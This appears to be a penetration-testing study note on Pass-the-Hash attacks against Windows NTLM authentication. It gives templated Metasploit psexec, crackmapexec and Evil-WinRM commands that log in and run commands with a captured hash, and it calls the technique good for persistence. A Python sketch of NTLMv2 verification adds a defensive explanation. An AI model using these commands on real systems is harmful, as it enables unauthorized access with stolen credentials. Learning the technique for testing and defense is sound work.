Check this YouTube video: https://youtu.be/YgQsrifaHwo

Pass-The-Hash is an exploitation technique that involves capturing or harvesting NTLM hashes (or clear-text passwords) and using them to authenticate to the target legitimately.

  • This works because NTLM authentication only requires the NTLM hash, not the original password.
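As an added illustration (not from the original notes or the video) of why the hash alone is enough: a Python sketch of the NTLMv2 challenge-response from MS-NLMP, using a constructed NT hash, user and domain. Both the client's proof and the server's check are keyed only by the NT hash, which is why a harvested hash is password-equivalent and must be protected like one.

```python
import hashlib
import hmac
import os
import struct

# Constructed sample values (not real credentials). A real NT hash is
# MD4(UTF-16LE(password)); nothing below ever needs the password itself.
NT_HASH = bytes.fromhex("31d6cfe0d16ae931b73c59d7e0c089c0")  # hypothetical
USER, DOMAIN = "alice", "CORP"  # hypothetical account
MSV_AV_EOL = b"\x00\x00\x00\x00"  # minimal target-info blob (AV_PAIR list terminator)


def ntowf_v2(nt_hash: bytes, user: str, domain: str) -> bytes:
    """NTLMv2 response key (MS-NLMP 3.3.2): derived from the NT hash only."""
    ident = (user.upper() + domain).encode("utf-16-le")
    return hmac.new(nt_hash, ident, hashlib.md5).digest()


def ntlmv2_response(nt_hash, user, domain, server_challenge, client_challenge,
                    timestamp, target_info=MSV_AV_EOL):
    """Client side: NtChallengeResponse = NTProofStr || temp."""
    temp = (b"\x01\x01" + b"\x00" * 6 + struct.pack("<Q", timestamp)
            + client_challenge + b"\x00" * 4 + target_info + b"\x00" * 4)
    key = ntowf_v2(nt_hash, user, domain)
    proof = hmac.new(key, server_challenge + temp, hashlib.md5).digest()
    return proof + temp


def server_verify(stored_nt_hash, user, domain, server_challenge, response):
    """Server side: recompute NTProofStr from the stored hash and compare.
    The server holds the same hash the client used, never the password."""
    proof, temp = response[:16], response[16:]
    key = ntowf_v2(stored_nt_hash, user, domain)
    expected = hmac.new(key, server_challenge + temp, hashlib.md5).digest()
    return hmac.compare_digest(proof, expected)


def demo():
    """Fresh challenge: hash-only client proof is accepted; a reused response
    against a different server challenge is rejected."""
    server_challenge = os.urandom(8)
    resp = ntlmv2_response(NT_HASH, USER, DOMAIN, server_challenge,
                           os.urandom(8), 0x01D9ABCD12345678)
    accepted = server_verify(NT_HASH, USER, DOMAIN, server_challenge, resp)
    replayed = server_verify(NT_HASH, USER, DOMAIN, os.urandom(8), resp)
    return accepted, replayed
```

The server-side check is what a domain controller or local SAM effectively does; it is the reason NTLM hash exposure (LSASS, SAM, NTDS.dit) should be treated as full credential compromise.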

We can use multiple tools to facilitate a Pass-The-Hash attack:
  • Metasploit PsExec module [[SMB PsExec]] exploit/windows/smb/psexec

    • 🛑 If this module doesn't work, try changing the target.
    • Specify LPORT and RHOSTS.
    • Set SMBUser <user>
    • Set SMBPass <Extracted_NTLM_Hash>

  • Crackmapexec

    • Alternative tool for performing Pass-The-Hash.
    • crackmapexec smb <target_ip> -u <username> -p <"Password">
    • 🛑 Use -H instead of -p, because -H is the hash option (and put the hash inside quotation marks "").
    • To run commands: crackmapexec smb <target_ip> -u <username> -H <"NTLM_Hash"> -x "ipconfig"

  • Evil-WinRM (also accepts the NTLM hash instead of a password)

You don't need to crack the hashes; just pass both the LM and NTLM hashes in the form "LM:NT".

This is also considered a good technique for persistence.